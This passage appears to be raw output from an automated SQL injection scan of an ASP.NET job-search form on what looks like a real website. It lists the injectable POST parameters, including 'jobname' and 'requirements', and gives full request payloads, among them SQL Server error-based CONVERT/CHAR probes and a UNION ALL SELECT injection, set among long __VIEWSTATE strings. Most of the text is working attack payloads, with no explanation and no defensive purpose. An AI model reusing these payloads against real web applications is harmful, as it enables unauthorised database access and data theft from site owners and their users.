w5byPZAIJD2QWBAIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MTkWAmYPFQE
M5raI5q S56KX5p cZAIDDxYCHwACAxYGZg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTIwFgJmDxUBCeW1jOWFpeW8j2QCAQ9kFgICAQ8WAh8B
BS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTIxFgJmDxUBBuWNp 
W8j2QCAg9kFgICAQ8WAh8BBS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTIyFgJmDxUBBueri 
W8j2QCCg9kFgQCAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTU1FgJmDxUBDOWHgOawtOiuvuWkh2QCAw8WAh8AZm
QCCw9kFgQCAQ8WAh8BBS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTU2FgJmDxUBD WFtuWug 
Wwj WutueUtWQCAw8WAh8AZmQCDA9kFgQCAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTgyFgJmDxUBCeeUteeDpOeusWQCAw8WAh8AZmQCVA8
WAh8AAggWEGYPZBYCZg8VAwExATMG5qW855uYZAIBD2QWAmYPFQMBMQExBumFkuW6l2QCAg9kFgJmDxUDATECNDkb5b
el5Lia5LyB5Lia5Y 
K5bel5Lia5Zut5Yy6ZAIDD2QWAmYPFQMBMQMxMDIM6YeH5pqW5bel56iLZAIED2QWAmYPFQMBMQEyBuWtpuagoWQCBQ9k
FgJmDxUDATEBNQNCT1RkAgYPZBYCZg8VAwExATQG5Yy76ZmiZAIHD2QWAmYPFQMBMQI5MxLlhbblroPlhazlhbHlu7rnrZFkAo
gBD2QWAgIDD2QWAgIDDzwrAAkBAA8WBB4IRGF0YUtleXMWAB8AZmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfX
xYCBRhjdGwwMCRjdGwwMCRpbWdCdG5TZWFyY2gFQmN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBs
YWNlSG9sZGVyMV8xJFJhZGlvQnV0dG9uMSr4AhLdKSfuuynf2bvUCGQ7ryPM&__VIEWSTATEGENERATOR=A8C87D47&__EVENTT
ARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWJQLd75TGBgLp4ai0CgLNpdNCAoDGjNoPAqD0o48BAvugpJwMAv
/Zn5QCArHDg8MOAsqLk gPAuCcwScCxITh AMCr7/U AMCt/Cwwg8CmcCeuQEC4 eeuQEC4 
fq3Q4CmP71ugECk83H2AoCtMzIvA8CvaPi0gMCu6OS0QMCuaOi0QMCvqOi0QMC4sjtoAEC69PCtAYCvcjo3wIC9putiQkCz/Szng
MCiNf8hwQCiaOq6wIC58vilwgC7I3BwwICrLuYmw0CtPrDhAECpt7vpA8C 
Yyv8gICgYjTrgkmSfoABjx3ctbSuPmqwSlgunvSEg==&ctl00$ctl00$search=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHold
er1_1$departments=%E8%90%A5%E9%94%80&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$education=
%E5%8D%9A%E5%A3%AB
%E7%A0%94%E7%A9%B6%E7%94%9F&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$releaseDate=7&ctl00$ctl00$
ContentPlaceHolder1$ContentPlaceHolder1_1$experience=%E5%BA%94%E5%B1%8A%E6%AF%95%E4%B8%9A
%E7%94%9F&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$requirements=1&ctl00$ctl00$ContentPlaceHolder1$Co
ntentPlaceHolder1_1$professional=3&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$jobname=4%' AND 
2199=CONVERT(INT,(SELECT CHAR(113) CHAR(121) CHAR(107) CHAR(106) CHAR(113) (SELECT (CASE WHEN (2199=2199) THEN 
CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(111) CHAR(100) CHAR(113))) AND 
'%'='&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$RadioButton1=RadioButton1&ctl00$ctl00$ContentPlaceHolder
1$ContentPlaceHolder1_1$jobSearch=%E6%90%9C   %E7%B4%A2
    Type: UNION query
    Title: Generic UNION query (95) - 6 columns
    Payload: 
__VIEWSTATE=/wEPDwUKMTc0NTU5OTYzMw9kFgJmD2QWAmYPZBYCAgMPZBYGAjwPFgIeC18hSXRlbUNvdW50Ag0WGmYPZ
BYEAgEPFgIeBGhyZWYFLX4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MRYCZg8VAQ/nh4PmsJ
Tng63msLTlmahkAgMPFgIfAAIEFghmD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVn
b3J5SWQ9MzIWAmYPFQEWU ezu WIl  8iOi2heixquWNju 8iWQCAQ9kFgICAQ8WAh8BBS1 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTUWAmYPFQETReezu WIl  8iOixquWNju 
8iWQCAg9kFgICAQ8WAh8BBS1 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTQWAmYPFQETQ ezu 
WIl  8iOS4ree6p  8iWQCAw9kFgICAQ8WAh8BBS1 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTMWAmYPFQEM5bmz6KGh57O75YiXZAIBD2QWBAIBDxY
CHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MjMWAmYPFQEM55S154Ot5rC05ZmoZAI
DDxYCHwACBRYKZg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTcyFgJmDxUBF mAn 
eDrS/nnqzng60g5pm66IO95Z6LZAIBD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb
3J5SWQ9MjQWAmYPFQES5Y M6Ziy55S155u 
5pm66IO9ZAICD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MjUWAmYP
FQES5Y M6Ziy55S155u 
5py65qKwZAIDD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MjYWAmYP
FQEP6Ziy55S16Ze457O75YiXZAIED2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5
SWQ9MjcWAmYPFQES5b 
r54Ot5byP54Ot5rC05ZmoZAICD2QWBAIBDxYCHwEFLX4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5S
WQ9ORYCZg8VAQnlo4HmjILngolkAgMPFgIfAAILFhZmD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5
hc3B4P0NhdGVnb3J5SWQ9MTMWAmYPFQEHWeezu WIl2QCAQ9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTE0FgJmDxUBB0Xns7vliJdkAgIPZBYCAgEPFgIfAQUufi9wc
m9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0xMBYCZg8VAQdT57O75YiXZAIDD2QWAgIBDxYCHwEFLn
4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MzUWAmYPFQEHSOezu 
WIl2QCBA9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTExFgJmDxUBD0zns7vliJco5Ya35YedKWQCBQ9kFgICAQ8
WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTM3FgJmDxUBD1Lns7vliJco5Ya35YedKWQCBg9kFgICAQ8
WAh8BBS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTM4FgJmDxUBEFdI57O75YiXKOWGt 
WHnSlkAgcPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0zNhYCZg8VAQ9a5
7O75YiXKOWGt 
WHnSlkAggPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD02NhYCZg8VARNU
57O75YiX77yI5Ya35Yed77yJZAIJD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5S
WQ9NjkWAmYPFQEHQeezu WIl2QCCg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTcwFgJmDxUBB0vns7vliJdkAgMPZBYEAgEPFgIfAQUufi9w
cm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0yOBYCZg8VARLlpKrpmLPog73ng63msLTlmahkAgMPFgI
fAAICFgRmD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9NDgWAmYPFQ
Ee6Ziz5Y 
w5aOB5oyC5byP5bmz5p2/5aSq6Ziz6IO9ZAIBD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0
NhdGVnb3J5SWQ9NDkWAmYPFQEh5Yir5aKF54Ot5rC05Lit5b 
D5bmz5p2/5aSq6Ziz6IO9ZAIED2QWBAIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SW
Q9NzMWAmYPFQEKR0FBVOezu 
WIl2QCAw8WAh8AAgYWDGYPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0
3NBYCZg8VAQdZ57O75YiXZAIBD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5S
WQ9NzUWAmYPFQEHReezu WIl2QCAg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTc2FgJmDxUBB0jns7vliJdkAgMPZBYCAgEPFgIfAQUufi9wc
m9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD03NxYCZg8VAQdM57O75YiXZAIED2QWAgIBDxYCHwEFLn
4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9NzgWAmYPFQEHVOezu 
WIl2QCBQ9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTc5FgJmDxUBB1Pns7vliJdkAgUPZBYEAgEPFgIfAQUufi9wc
m9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0yORYCZg8VARjnqbrmsJTmupDng63ms7Xng63msLTlmah
kAgMPFgIfAAIEFghmD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MzM
WAmYPFQEP55S16L6F5LiA5L2T5py6ZAIBD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0Nhd
GVnb3J5SWQ9MzkWAmYPFQES5rC05b6q546v5YiG5L2T5py6ZAICD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaW
VzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9NjgWAmYPFQES5rCf5b6q546v5YiG5L2T5py6ZAIDD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC
9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9NDQWAmYPFQEM5ZWG55So54Ot5rO1ZAIGD2QWBAIBDxYCHwE
FLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MzAWAmYPFQEY6IO95rqQ6ZuG5oiQ54Ot5rC05
7O757ufZAIDDxYCHwACBRYKZg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTUwFgJmDxUBDOmYs WFieeHg 
eDrWQCAQ9kFgICAQ8WAh8BBS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTUxFgJmDxUBDOmYs 
WFieeUteeDrWQCAg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTgxFgJmDxUBFeWIq WiheWei mYs 
WFieeUteeDrWQCAw9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTUyFgJmDxUBFeWIq WiheWei mYs WFieeHg 
eDrWQCBA9kFgICAQ8WAh8BBS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTgwFgJmDxUBFeWIq 
WiheWei mYs WFieeDreaztWQCBw9kFgQCAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTE1FgJmDxUBDOWQuOayueeDn 
acumQCAw8WAh8AAgMWBmYPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZ
D0xNhYCZg8VAQbmrKflvI9kAgEPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZ
D0xNxYCZg8VAQbkuK3lvI9kAgIPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZ
D0xOBYCZg8VAQnov5HlkLjlvI9kAggPZBYEAgEPFgIfAQUtfi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcn
lJZD02FgJmDxUBCeeHg 
awlOeBtmQCAw8WAh8AAgIWBGYPZBYCAgEPFgIfAQUtfi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJ
ZD03FgJmDxUBCeW1jOWFpeW8j2QCAQ9kFgICAQ8WAh8BBS1 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTgWAmYPFQEG5Y 
w5byPZAIJD2QWBAIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MTkWAmYPFQE
M5raI5q S56KX5p cZAIDDxYCHwACAxYGZg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTIwFgJmDxUBCeW1jOWFpeW8j2QCAQ9kFgICAQ8WAh8B
BS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTIxFgJmDxUBBuWNp 
W8j2QCAg9kFgICAQ8WAh8BBS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTIyFgJmDxUBBueri 
W8j2QCCg9kFgQCAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTU1FgJmDxUBDOWHgOawtOiuvuWkh2QCAw8WAh8AZm
QCCw9kFgQCAQ8WAh8BBS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTU2FgJmDxUBD WFtuWug 
Wwj WutueUtWQCAw8WAh8AZmQCDA9kFgQCAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTgyFgJmDxUBCeeUteeDpOeusWQCAw8WAh8AZmQCVA8
WAh8AAggWEGYPZBYCZg8VAwExATMG5qW855uYZAIBD2QWAmYPFQMBMQExBumFkuW6l2QCAg9kFgJmDxUDATECNDkb5b
el5Lia5LyB5Lia5Y 
K5bel5Lia5Zut5Yy6ZAIDD2QWAmYPFQMBMQMxMDIM6YeH5pqW5bel56iLZAIED2QWAmYPFQMBMQEyBuWtpuagoWQCBQ9k
FgJmDxUDATEBNQNCT1RkAgYPZBYCZg8VAwExATQG5Yy76ZmiZAIHD2QWAmYPFQMBMQI5MxLlhbblroPlhazlhbHlu7rnrZFkAo
gBD2QWAgIDD2QWAgIDDzwrAAkBAA8WBB4IRGF0YUtleXMWAB8AZmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfX
xYCBRhjdGwwMCRjdGwwMCRpbWdCdG5TZWFyY2gFQmN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBs
YWNlSG9sZGVyMV8xJFJhZGlvQnV0dG9uMSr4AhLdKSfuuynf2bvUCGQ7ryPM&__VIEWSTATEGENERATOR=A8C87D47&__EVENTT
ARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWJQLd75TGBgLp4ai0CgLNpdNCAoDGjNoPAqD0o48BAvugpJwMAv
/Zn5QCArHDg8MOAsqLk gPAuCcwScCxITh AMCr7/U AMCt/Cwwg8CmcCeuQEC4 eeuQEC4 
fq3Q4CmP71ugECk83H2AoCtMzIvA8CvaPi0gMCu6OS0QMCuaOi0QMCvqOi0QMC4sjtoAEC69PCtAYCvcjo3wIC9putiQkCz/Szng
MCiNf8hwQCiaOq6wIC58vilwgC7I3BwwICrLuYmw0CtPrDhAECpt7vpA8C 
Yyv8gICgYjTrgkmSfoABjx3ctbSuPmqwSlgunvSEg==&ctl00$ctl00$search=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHold
er1_1$departments=%E8%90%A5%E9%94%80&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$education=
%E5%8D%9A%E5%A3%AB
%E7%A0%94%E7%A9%B6%E7%94%9F&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$releaseDate=7&ctl00$ctl00$
ContentPlaceHolder1$ContentPlaceHolder1_1$experience=%E5%BA%94%E5%B1%8A%E6%AF%95%E4%B8%9A
%E7%94%9F&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$requirements=1&ctl00$ctl00$ContentPlaceHolder1$Co
ntentPlaceHolder1_1$professional=3&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$jobname=4%' UNION ALL 
SELECT 95,95,95,CHAR(113) CHAR(121) CHAR(107) CHAR(106) CHAR(113) CHAR(119) CHAR(90) CHAR(121) CHAR(116) CHAR(101) 
CHAR(105) CHAR(90) CHAR(69) CHAR(84) CHAR(88) CHAR(113) CHAR(122) CHAR(111) CHAR(100) CHAR(113),95,95-- 
&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$RadioButton1=RadioButton1&ctl00$ctl00$ContentPlaceHolder1$C
ontentPlaceHolder1_1$jobSearch=%E6%90%9C   %E7%B4%A2
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$requirements
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: 
__VIEWSTATE=/wEPDwUKMTc0NTU5OTYzMw9kFgJmD2QWAmYPZBYCAgMPZBYGAjwPFgIeC18hSXRlbUNvdW50Ag0WGmYPZ
BYEAgEPFgIeBGhyZWYFLX4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MRYCZg8VAQ/nh4PmsJ
Tng63msLTlmahkAgMPFgIfAAIEFghmD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVn
b3J5SWQ9MzIWAmYPFQEWU ezu WIl  8iOi2heixquWNju 8iWQCAQ9kFgICAQ8WAh8BBS1 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTUWAmYPFQETReezu WIl  8iOixquWNju 
8iWQCAg9kFgICAQ8WAh8BBS1 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTQWAmYPFQETQ ezu 
WIl  8iOS4ree6p  8iWQCAw9kFgICAQ8WAh8BBS1 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTMWAmYPFQEM5bmz6KGh57O75YiXZAIBD2QWBAIBDxY
CHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MjMWAmYPFQEM55S154Ot5rC05ZmoZAI
DDxYCHwACBRYKZg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTcyFgJmDxUBF mAn 
eDrS/nnqzng60g5pm66IO95Z6LZAIBD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb
3J5SWQ9MjQWAmYPFQES5Y M6Ziy55S155u 
5pm66IO9ZAICD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MjUWAmYP
FQES5Y M6Ziy55S155u 
5py65qKwZAIDD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MjYWAmYP
FQEP6Ziy55S16Ze457O75YiXZAIED2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5
SWQ9MjcWAmYPFQES5b 
r54Ot5byP54Ot5rC05ZmoZAICD2QWBAIBDxYCHwEFLX4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5S
WQ9ORYCZg8VAQnlo4HmjILngolkAgMPFgIfAAILFhZmD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5
hc3B4P0NhdGVnb3J5SWQ9MTMWAmYPFQEHWeezu WIl2QCAQ9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTE0FgJmDxUBB0Xns7vliJdkAgIPZBYCAgEPFgIfAQUufi9wc
m9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0xMBYCZg8VAQdT57O75YiXZAIDD2QWAgIBDxYCHwEFLn
4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MzUWAmYPFQEHSOezu 
WIl2QCBA9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTExFgJmDxUBD0zns7vliJco5Ya35YedKWQCBQ9kFgICAQ8
WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTM3FgJmDxUBD1Lns7vliJco5Ya35YedKWQCBg9kFgICAQ8
WAh8BBS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTM4FgJmDxUBEFdI57O75YiXKOWGt 
WHnSlkAgcPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0zNhYCZg8VAQ9a5
7O75YiXKOWGt 
WHnSlkAggPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD02NhYCZg8VARNU
57O75YiX77yI5Ya35Yed77yJZAIJD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5S
WQ9NjkWAmYPFQEHQeezu WIl2QCCg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTcwFgJmDxUBB0vns7vliJdkAgMPZBYEAgEPFgIfAQUufi9w
cm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0yOBYCZg8VARLlpKrpmLPog73ng63msLTlmahkAgMPFgI
fAAICFgRmD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9NDgWAmYPFQ
Ee6Ziz5Y 
w5aOB5oyC5byP5bmz5p2/5aSq6Ziz6IO9ZAIBD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0
NhdGVnb3J5SWQ9NDkWAmYPFQEh5Yir5aKF54Ot5rC05Lit5b 
D5bmz5p2/5aSq6Ziz6IO9ZAIED2QWBAIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SW
Q9NzMWAmYPFQEKR0FBVOezu 
WIl2QCAw8WAh8AAgYWDGYPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0
3NBYCZg8VAQdZ57O75YiXZAIBD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5S
WQ9NzUWAmYPFQEHReezu WIl2QCAg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTc2FgJmDxUBB0jns7vliJdkAgMPZBYCAgEPFgIfAQUufi9wc
m9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD03NxYCZg8VAQdM57O75YiXZAIED2QWAgIBDxYCHwEFLn
4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9NzgWAmYPFQEHVOezu 
WIl2QCBQ9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTc5FgJmDxUBB1Pns7vliJdkAgUPZBYEAgEPFgIfAQUufi9wc
m9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0yORYCZg8VARjnqbrmsJTmupDng63ms7Xng63msLTlmah
kAgMPFgIfAAIEFghmD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MzM
WAmYPFQEP55S16L6F5LiA5L2T5py6ZAIBD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0Nhd
GVnb3J5SWQ9MzkWAmYPFQES5rC05b6q546v5YiG5L2T5py6ZAICD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaW
